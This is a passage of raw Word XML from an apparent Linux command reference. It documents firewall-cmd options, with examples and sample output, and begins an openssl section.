            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC54C7F"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list-interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="051462B5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List interfaces in zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="444F635B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="075477F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dd-interface=INTERFACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E8AF7C0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Add interface to zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6AD5A045" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A3756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emove-interface=INTERFACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DDB8DA3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Remove interface from zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6465ACD3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2072733A"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list-sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BB2ACC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List source networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4DDFC64E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BA3F6E4"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dd-source=SOURCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C43534E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Add source network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="641E32A8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CC7788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emove-source=SOURCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B688760" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Remove source network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="03DC9133" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758A4D7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list-rich-rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55CBBB48" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List rich rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0958CDB8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FBB156A"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dd-rich-rule=RULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07314CB7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Add rich rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4C558F71" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ED8B90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emove-rich-rule=RULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3F0953" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Remove rich rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="02B357C8" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="096CB72C"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dd-masquerade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ABBD3A6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Enable masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="38CEF6FB" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353B4A48"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lastRenderedPageBreak/>
              <w:t>--remove-masquerade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E9D6F98" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Disable masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7DE0EFCC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76E5D013"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query-masquerade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="696C6163" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Check masquerading status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5E4F1379" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="395C6756"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add-forward-port=SPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28F51C65" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Add port forwarding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2EB73D48" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AAAFF6C"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emove-forward-port=SPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D158C61" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Remove port forwarding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="075D9221" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46B6B70B"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help</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A98EA33" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show help information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4A6A6D7E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BBBA92C"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version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5955C4C4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show version information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FF74FE4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0C4DA" w14:textId="2B326838" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Check firewall status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CD61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udo firewall-cmd --state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEADD7" w14:textId="166F8DBB" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>List all settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FD76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udo firewall-cmd --list-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796D957" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CB97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public (active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604FD4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arget: default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287552DA"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icmp-block-inversion: no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F848A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interfaces: eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0888E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ources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A173C"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ervices: dhcpv6-client ssh http https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA2D8A"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ports: 8080/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4411F1A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protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71854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masquerade: no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411342F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forward-ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE05AF"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ource-ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CC44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icmp-blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36725FA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rich rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCB301" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC1AAF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>public (active)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Current firewall zone is "public" and actively filtering traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699885EF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target: default</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Default action for packets not matching specific rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B572447" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icmp-block-inversion: no</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ICMP blocking behavior (normal mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79177455" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interfaces: eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Network interface(s) assigned to this zone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D6D818" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: IP addresses/networks assigned to zone (empty = none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342CC3E5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Predefined service rules (SSH, HTTP, HTTPS, DHCPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464045B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ports: 8080/tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Custom port openings (port 8080 for TCP traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C07DA91" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Additional protocols allowed (empty = none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458DFC4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masquerade: no</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Network address translation disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D3C0A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forward-ports</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Port forwarding rules (empty = none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754543AA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rich rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Advanced custom firewall rules (empty = none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41D0A8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complete configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows all firewall settings for current zone protocols: masquerade: no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EEBFA1" w14:textId="523ED314" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Add service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A746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udo firewall-cmd --add-service=http --permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5790895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udo firewall-cmd --reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF23E26" w14:textId="179A3261" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Add port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E472CB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udo firewall-cmd --add-port=8080/tcp --permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A69ED" w14:textId="62560506" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>List available zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E8AF4"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firewall-cmd --get-zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F59506" w14:textId="2485E44B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>openssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3862CD9D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command is a powerful cryptographic toolkit for SSL/TLS operations and certificate management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176CFFC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615C91F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Generate certificates, test SSL/TLS connections, encrypt/decrypt data, and manage PKI operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1642F" w14:textId="18DE4816" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD223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openssl command [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251641DE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options and Commands</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1222"/>
        <w:gridCol w:w="3848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="01D702EF" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
